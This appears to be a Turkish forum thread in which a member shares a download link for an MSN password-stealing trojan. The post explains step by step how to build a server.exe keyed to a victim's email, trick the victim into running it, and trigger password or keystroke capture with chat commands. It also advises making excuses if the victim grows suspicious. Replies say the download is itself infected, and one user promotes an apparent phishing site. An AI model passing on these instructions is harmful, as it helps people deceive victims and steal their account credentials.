yeni bir msn hack

ibrahimxxx

New member
arkadaşlar bu daha onceden de açılan bır başlıksa çok ozur dılerım şimdiden

http://membres.lycos.fr/hackertaourirt2003/HotmailHackerX-Edition.zip

önce programı yukardaki linke tıklayarak indirin

Şimdi bahsi gecen program, kurbana bir EXE gondererek Msn Messenger/Windows Messenger şifrelerini almaya calısan bir programdır.

Bunun için kurbana server.exe yi yolluyoruz ve actıgından emin oluyoruz daha sonra HH X-Edition.exe adındaki ana programımızı acarak gerekli işlemlere başlıyoruz.

General setting ten Open sbutonuna basıyoruz ve kişiye yollayacagımız server.exe nin yolunu gosteriyoruz daha sonra asagıdaki Victim Email adresine kurbanın email adresini yazıyoruz, ve baska herhangi bir şeye dokunmadan Apply setting kısmına gecip Save setting butonuna basıyoruz.

Artık kurban için server.exe miz hazırlandı, bu yeni server.exe yi kurbana yolluyoruz ve exe acılınca kurbanın msn durumunda degişiklikler meydana gelicek ve "be right back" (hemen donucek) durumuna gecicektir.

işte bu anda biz kurbana ??? yazıp yolluyoruz ve işlem sorunsuz gercekleştiyse şifre size msn mesajı olarak gelicektir.

Eger şifre gelmezse ozaman $key$ yazıp kurbana tekrar mesaj olarak yollayın bu sayede kurbanın yazıdıgı şeylerin kayıtlarını alıcaksınız..

Bu işlemler gercekleşirken kurbana msn den herhangi bir yazı gitmiyecektir, o sırada siz aslında yolladıgınız server.exe ye gerekli komutları vermektesinizdir

Ama işlemlerde bir sorun olurda kurban neden ??? yada $key$ yazıyorsun derse, sizde ona "kusura bakma bişi deniyorum" gibisinden kacamak cevaplar vermeniz tavsiye edilir.

Bu programın diger komutlarına gelircek olursak;

/sysinfo >> MSN surum bilgisi,işletim sistemi bilgisi ve IP bilgisi

/nick HACK >> kurbanın msn adı HACK olur

/msgbox HACK >> kurbana HACK diye bir uyarı gonderir

/status away >> msn durumunu away (dısarda) yapar

teşekkür ed yeter

toranaga79

New member
bunun bi de resimli anlatım ı olan bi şeyler hazırlarsan çok güzel olacak,eğer böyle

bi şeyi zahmet edip yaparsan şimdiden çok teşşekkürler. kolay gelsin ,klavyene sağlık

toranaga79

New member
aloooo bu program virüslü . program yöneticileri uyuyormusunuz,birleşicenize işinizi yapın ilk önce

yeninesilajan

New member
Kardeş tabiki virüslü

Arkadaşım senin verdiğin bu program küçük bir trojan we bu programın kullanılması için karşı bilgisayarda anti virüs programı olmaması lazım yada olsa bile bu trojanı tanımaması lazım ben indirdim tanıdı ve imha etti ben daha farklı yollarla hack yapıyorum tabi yerlerse www.msnoyun.galerisi.com diye bi site yaptım şifre direk geliyo

+u+énsté!n

FoRum ineği
way be yeni oyunlar ha_? oyunlar 2 gün içinde gelcek yani..abi sölesene ne oyunlar war sitende yazmıodu..bn kayıt oldum walla...

böle şeyler için site bilen warsa yazsın lütfeeen

edit:bak yeninesil,senin bu yaptığın işe biz lamerlik diorz.gerenk yok abicim.gerçi güzel hazırlamışında,bi kaç oyunda werseydin gerçekten daha inancırıcı olurdu..neyse se bnim mailimi bekle:p:p:p:p

єяєη

є-∂єsїgηє&#1103
Eline Sağlık...

sukrusa

New member
evet linke el atsana kardeş yada hemenpaylaş yapında bizde bakalım şu programa paylaşımın için thanks

By.Sperminator:)

HTML